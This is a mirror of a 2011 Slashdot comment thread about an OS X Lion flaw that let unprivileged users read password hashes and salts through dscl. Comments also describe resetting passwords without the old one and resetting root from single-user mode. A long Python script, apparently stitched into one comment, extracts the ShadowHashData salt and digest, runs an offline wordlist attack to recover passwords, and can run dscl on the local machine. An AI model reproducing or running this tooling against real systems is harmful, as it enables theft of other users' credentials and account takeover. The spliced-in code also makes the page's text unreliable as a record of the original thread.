Slashdot Mirror


Aussie Researcher Cracks OS X Lion Passwords

daria42 writes "Thought your Mac was secure running Apple's latest operating system? Think again. Turns out that in some respects Lion is actually less secure than previous versions of Mac OS X, due to some permission-tweaking by Apple that has opened up a way for an attacker to crack your password on your Lion box. The flaw was discovered by an Australian researcher who has previously published a guide to cracking Mac OS X passwords. Sounds like Apple had better get a patch out for this."

11 of 165 comments

  1. Not really cracking the passwords. by Anonymous Coward · · Score: 4, Informative

He's not really cracking the passwords. He's just found a way to read the hash and salt from each user's shadow file without root privileges. It's fairly serious, but the hashes still need to be brute-forced.

    1. Re:Not really cracking the passwords. by CaptainJeff · · Score: 5, Interesting

Most common approach to password cracking = brute force, targeting the specific hash (with the specific salt) of the account you're trying to crack. Step one of such an attack = determining the hash and salt that you're targeting. Which is what he figured out. If he's now brute-forcing those hashes, then he absolutely is cracking the passwords (well, he's trying to anyway).

      But your basic point is right...he's figured out a way to capture hash/salt data, which he still should not be able to do. Since Lion uses SHA-256 hashes for its shadow file, that cracking attempt is still going to be quite difficult.

      The more important part of this article is that under some circumstances, you can change the password of the logged in user without entering the current password. Now, *that* is a big deal (the degree of which is subject to valid debate).

    2. Re:Not really cracking the passwords. by Anonymous Coward · · Score: 4, Informative

for this to work, a particular java app must be installed and run on a website which is run on the Mac OS X computer.

      No, that's just one attack vector suggested in the article to illustrate how this could be abused.

      This is all possible, but basically FUD

      ANY application which runs with a regular user permission CAN access the hashes for ALL the user passwords on the system.
      That's not FUD. Also, the method described is not just possible, that's exactly how many infections occur these days.

  2. Here's the full details. by Core+Condor · · Score: 5, Informative

    http://www.techgineering.org/2011/09/22/2489/a-new-exploit-in-os-x-lion-allows-unauthorized-access-to-users-to-change-password/ - A New Exploit in OS X Lion Allows Unauthorized Access To Users to Change Password

    1. Re:Here's the full details. by spydir31 · · Score: 4, Informative

      Even better is the researchers' own blog post

  3. Extremely Serious by Manip · · Score: 4, Insightful

    I was expecting to read one of the normal fear-mongering stories that we often see on /. (e.g. "Drop Box sends passwords in plain text!!") but actually this is one of the most serious OS level holes I've seen in years. Not only can you retrieve the password for any user on the system but you can also reset their password without having to know what it was.

    People have posted "they're still hashes so you still have to break them" which is of course true, but if you keep reading down he shows you how to reset the other user's password without ever having to know them.

    1. Re:Extremely Serious by RyuuzakiTetsuya · · Score: 5, Funny

      Worst?! XP had that flaw that let you install Vista.

      --
      Non impediti ratione cogitationus.
  4. Re:So not serious by boristhespider · · Score: 4, Insightful

You can change the root password on a Mac box without ANY credentials, provided you have physical access. Seems we have forgotten this while everyone is fear-mongering about what someone can do over the 'net.

Sorry for the sarcasm, but basically once someone has physical access to your computer you're boned unless you've encrypted your drive. It's Macs I know best, and it's trivial: boot to single user mode (command+S at start), mount the file system as read/write (it even gives onscreen instructions for doing this) and then change the root password. I imagine something very similar can be done in Linux if there's an easy way to get it into single-user mode. Besides, on any machine to which you have physical access you can always boot a live distro and at the very least access the hashes if not easily take full control of the system.

  5. Changing password without any challenge by Bloody+Peasant · · Score: 4, Interesting

    Agreed; and what most here have totally missed is the fact that there is no "existing password" challenge if you use dscl localhost... as TFA says right at the end, almost as an afterthought.

    --
    -- This .sig intentionally left meaningless.
  6. While it's possible... by Anonymous Coward · · Score: 5, Interesting

    Either it's already been patched, as I'm running the developer builds of 10.7.2, or there's an issue in his particular setup vs. a normal install that's allowing this to happen.

    Stepping through the information on his own blog at: http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html

    When performing his "dscl localhost -read /Search/Users/" I do NOT get the dsAttrTypeNative:ShadowHashData result UNLESS I have root privileges through sudo. Not even for my own user.
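Comments 1 and 6 above both hinge on the same two facts: whether `dscl localhost -read /Search/Users/<user>` hands an unprivileged user the `dsAttrTypeNative:ShadowHashData` attribute, and what an attacker can do with it afterwards (the hash is salted, so a wordlist or brute-force run is still needed). The following Python is an added example written for this page; it is not the researcher's script, not Apple's code, and not taken from the linked blog post. It assumes the Lion 10.7 layout as commonly documented: ShadowHashData is a binary plist holding a `SALTED-SHA512` entry of 4 salt bytes followed by `SHA-512(salt || password)`. The dscl output it parses is constructed inline so the block runs offline; the optional `check_local_exposure` helper only shells out to `dscl` when that tool exists (i.e. on a Mac), and is the check comment 6 describes.

```python
"""Parse Lion-style ShadowHashData as printed by dscl and test a wordlist against it.

Added example for this thread, not the researcher's or Apple's code.
Assumptions (not confirmed by this page):
  - ShadowHashData is a binary plist; key "SALTED-SHA512" holds
    4 salt bytes + SHA-512(salt || utf8(password)) = 68 bytes.
  - dscl prints the attribute as "dsAttrTypeNative:ShadowHashData:" followed by a hex dump.
The sample dscl output below is constructed, not captured from a real machine.
"""
import hashlib
import plistlib
import re
import shutil
import subprocess
from typing import Iterable, Optional, Tuple

SALT_LEN = 4          # assumed salt length for Lion's SALTED-SHA512
DIGEST_LEN = 64       # SHA-512 output length

# Matches the attribute name and the run of hex byte pairs dscl prints after it.
_SHADOW_RE = re.compile(r"dsAttrTypeNative:ShadowHashData:\s*((?:[0-9a-fA-F]{2}\s*)+)")


def make_salted_sha512(password: str, salt: bytes) -> bytes:
    """Build a SALTED-SHA512 record (salt || SHA-512(salt || password)) under the assumed layout."""
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be %d bytes" % SALT_LEN)
    return salt + hashlib.sha512(salt + password.encode("utf-8")).digest()


def build_sample_dscl_output(password: str, salt: bytes, user: str = "bob") -> str:
    """Constructed stand-in for `dscl localhost -read /Search/Users/<user>` output."""
    blob = plistlib.dumps({"SALTED-SHA512": make_salted_sha512(password, salt)},
                          fmt=plistlib.FMT_BINARY)
    hexstr = blob.hex()
    hexdump = " ".join(hexstr[i:i + 8] for i in range(0, len(hexstr), 8))
    return "dsAttrTypeNative:ShadowHashData:\n %s\nRecordName: %s\n" % (hexdump, user)


def extract_shadow_hex(dscl_output: str) -> Optional[str]:
    """Return the ShadowHashData hex (whitespace stripped), or None if the attribute is absent."""
    m = _SHADOW_RE.search(dscl_output)
    if not m:
        return None
    return re.sub(r"\s+", "", m.group(1)).lower()


def find_salted_sha512(shadow_hex: str) -> Tuple[bytes, bytes]:
    """Decode the binary plist inside ShadowHashData and split out (salt, digest)."""
    record = plistlib.loads(bytes.fromhex(shadow_hex))["SALTED-SHA512"]
    if len(record) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(record))
    return record[:SALT_LEN], record[SALT_LEN:]


def crack(salt: bytes, digest: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Offline wordlist attack: return the first candidate whose salted SHA-512 matches."""
    for pw in candidates:
        if hashlib.sha512(salt + pw.encode("utf-8")).digest() == digest:
            return pw
    return None


def check_local_exposure(user: str) -> Optional[bool]:
    """The check from comment 6: run dscl as the current (non-root) user and report whether
    ShadowHashData comes back. Returns None when dscl is not present (non-Mac host)."""
    if shutil.which("dscl") is None:
        return None
    proc = subprocess.run(["dscl", "localhost", "-read", "/Search/Users/%s" % user],
                          capture_output=True, text=True, check=False)
    return extract_shadow_hex(proc.stdout) is not None


if __name__ == "__main__":
    # Constructed sample: user "bob" with password "hunter2" and a fixed salt.
    sample_salt = bytes.fromhex("deadbeef")
    output = build_sample_dscl_output("hunter2", sample_salt)
    shadow_hex = extract_shadow_hex(output)
    salt, digest = find_salted_sha512(shadow_hex)
    print("salt=%s digest=%s..." % (salt.hex(), digest.hex()[:16]))
    print("cracked:", crack(salt, digest, ["password", "letmein", "hunter2"]))
    print("local dscl exposure for current user:", check_local_exposure("bob"))
```

To reproduce comment 6's test on a real Lion box, run the script unprivileged and again under `sudo`; if `check_local_exposure` reports `True` only with sudo, the box behaves the way that commenter saw, and if it reports `True` without sudo, the read described in the article works there.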

  7. Re:Interesting contrast I notice here by Uberbah · · Score: 4, Interesting

It's interesting how when OSX has....

    What's interesting is how every time Apple screws something up or does something unpopular, some clever guy pops in to post the requisite "now if this were Microsoft, you'd all be up in arms" post. Nevermind the same comment has been posted eleventy billion times before on this blog for more than 10 years.

    Case in point: the iCon 'book banning' story from 6 1/2 years ago, where publishing house Wiley had their books pulled after they wrote what Jobs obviously viewed as an unflattering biography:

    Balanced.. (Score:5, Insightful)
    by Flaming Death (447117)

If this were a MS story of Bill Gates doing the same, there would be the usual crazy outbreak of 'MS evil empire' type banter. However, because it's Apple, the response is a mild 'oh it's ok, he's the Apple man, he's allowed to'. Where is the balance? I think somewhere in between to be honest - Jobs and Gates are simply very ruthless business persons, and yet here at Slashdot there is a decided overflow towards Apple.

    Or:

    Bill Gates and Microsoft (Score:4, Insightful)

    I agree that these guys have a right to some privacy. Most interesting to me is that the comments here on /. are generally supportive so far. What a different thread it would be if this had been Bill Gates and Microsoft instead of Steve Jobs and Apple.

Nevermind the many highly rated comments suggesting Jobs back off, recounting how Jobs screwed Woz over a petty amount of money, or calling Jobs an unbelievable asshole.

    So clever.